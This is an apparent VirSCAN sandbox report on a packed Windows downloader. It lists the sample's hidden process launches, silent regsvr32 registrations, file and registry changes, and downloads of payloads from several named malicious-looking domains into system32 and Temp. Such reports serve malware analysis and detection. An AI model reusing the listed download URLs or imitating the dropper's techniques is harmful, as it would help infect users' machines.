VirSCAN

1. You can upload any file, but there is a 20 MB limit per file.
2. VirSCAN supports RAR/ZIP decompression, but the archive must contain fewer than 20 files.
3. VirSCAN can scan compressed files protected with the password 'infected' or 'virus'.


File information
Security score: 60
Basic information
MD5: e3c1f368d6927b2d1bcdd6e65b0de5a3
File type: EXE
Publisher:
Version:
Packer/compiler info: PACKER:UPX V2.00-V3.00 -> Markus Oberhumer & Laszlo Molnar & John Reiser *
Sub-file info: upx30_a4d483f6dumpFile / bf68e0efb34e56ab2681233661840aab / EXE
Key behaviors
Behavior: Creates writable file mapping
Details: CiceroSharedMemDefaultS-*
DfSharedHeap3D40C7
DFMap0-4014305
DfRoot0003D40C7
Behavior: Sets special folder attributes
Details: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior: Hides specified window
Details: [Window,Class] = [csdfasdf,ThunderRT6Main]
[Window,Class] = [,ThunderRT6FormDC]
Behavior: Sets thread context
Details: C:\WINDOWS\system32\ntvdm.exe
Process behavior
Behavior: Creates process with hidden window
Details: ImagePath = , CmdLine = regsvr32 /s "c:\windows\system32\mswinsck.ocx"
ImagePath = , CmdLine = regsvr32 /s "c:\docume~1\admini~1\locals~1\temp\~dfa3515.tmp"
Behavior: Creates process
Details: ImagePath = C:\WINDOWS\system32\ntvdm.exe, CmdLine = "C:\WINDOWS\system32\ntvdm.exe" -f -i1 -o
ImagePath = C:\WINDOWS\system32\regsvr32.exe, CmdLine = regsvr32 /s "C:\WINDOWS\system32\mswinsck.ocx"
ImagePath = C:\WINDOWS\system32\regsvr32.exe, CmdLine = regsvr32 /s "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFA3515.tmp"
Behavior: Sets thread context
Details: C:\WINDOWS\system32\ntvdm.exe
Behavior: Enumerates processes
Details: N/A
File behavior
Behavior: Creates writable file mapping
Details: CiceroSharedMemDefaultS-*
DfSharedHeap3D40C7
DFMap0-4014305
DfRoot0003D40C7
Behavior: Sets special folder attributes
Details: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5
C:\Documents and Settings\Administrator\Local Settings\History
C:\Documents and Settings\Administrator\Local Settings\History\History.IE5
C:\Documents and Settings\Administrator\Cookies
Behavior: Modifies file contents
Details: C:\WINDOWS\sys.dat---> Offset = 0
C:\WINDOWS\sys.dat---> Offset = 450
C:\WINDOWS\system32\xvqcv.exe---> Offset = 12288
C:\WINDOWS\win.ini---> Offset = 0
C:\WINDOWS\win.ini---> Offset = 492
C:\WINDOWS\sys.dat---> Offset = 162
C:\WINDOWS\Temp\scs3.tmp---> Offset = 36
C:\WINDOWS\sys.dat---> Offset = 408
C:\WINDOWS\Temp\scs4.tmp---> Offset = 77
C:\WINDOWS\sys.dat---> Offset = 1226
C:\WINDOWS\sys.dat---> Offset = 1264
C:\WINDOWS\sys.dat---> Offset = 2938
C:\WINDOWS\sys.dat---> Offset = 2940
C:\WINDOWS\sys.dat---> Offset = 3406
C:\WINDOWS\sys.dat---> Offset = 3916
Behavior: Searches for files
Details: FileName = C:\WINDOWS\system32\xvqcv.exe
FileName = C:\WINDOWS\system32\xvqcv.exebak
FileName = C:\WINDOWS
FileName = C:\WINDOWS\system32
FileName = C:\WINDOWS\sys.dat
FileName = C:\WINDOWS\system32\mswinsck.ocx
FileName = C:*.*
FileName = C:\MSDOS.SYS
FileName = C:\IO.SYS
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFA3515.tmp
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
FileName = C:\DOCUME~1
FileName = C:\DOCUME~1\ADMINI~1
FileName = C:\DOCUME~1\ADMINI~1\LOCALS~1
FileName = C:\Documents and Settings
Behavior: Creates executable file
Details: C:\WINDOWS\system32\mswinsck.ocx
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DFA3515.tmp
Network behavior
Behavior: Opens URL over the network
Details: InternetOpenUrlA: http://www.zgwm.net/ahjw-hnhnrwdong.txt hInternet = 0x0000067c
Behavior: Downloads file
Details: URLDownloadToFileW: http://www.zgwm.net/ahjw-hnhnrwdong.exe ---> C:\WINDOWS\system32\xvqcv.exebak
C:\WINDOWS\system32\xvqcv.exebak
URLDownloadToFileW: http://www.pc918.net/file.txt ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DFA8130.tmp
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DFA8130.tmp
URLDownloadToFileW: http://www.yswm.net/file.txt ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DFA8130.tmp
URLDownloadToFileW: http://www.v138.net/file.txt ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DFA8130.tmp
URLDownloadToFileW: http://www.v345.net/file.txt ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DFA8130.tmp
URLDownloadToFileW: http://www.ahwm.net/file.txt ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\DFA8130.tmp
URLDownloadToFileW: http://user.yswm.net/yswm/hnhnrwdong.ini ---> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4537.dat
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\4537.dat
Behavior: Reads file from network handle
Details: hFile = 0x0000067c, BytesToRead =256, BytesRead = 256.
Registry behavior
Behavior: Deletes registry key
Details: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}
Behavior: Deletes registry value
Details: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\ThreadingModel
Behavior: Modifies registry
Details: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32\ThreadingModel
\REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock\
\REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock\CLSID\
\REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock\CurVer\
\REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock.1\
\REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock.1\CLSID\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\VersionIndependentProgID\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ProgID\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Version\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\1\
\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ToolboxBitmap32\
Other behavior
Behavior: Creates mutex
Details: CTF.LBES.MutexDefaultS-*
CTF.Compart.MutexDefaultS-*
CTF.Asm.MutexDefaultS-*
CTF.Layouts.MutexDefaultS-*
CTF.TMD.MutexDefaultS-*
CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-*
SHIMLIB_LOG_MUTEX
Behavior: Hides specified window
Details: [Window,Class] = [csdfasdf,ThunderRT6Main]
[Window,Class] = [,ThunderRT6FormDC]
Behavior: Searches for specified window
Details: NtUserFindWindowEx: [Class,Window] = [ConsoleWindowClass,ntvdm-824.828.3c0002]
Runtime screenshot (image not included)
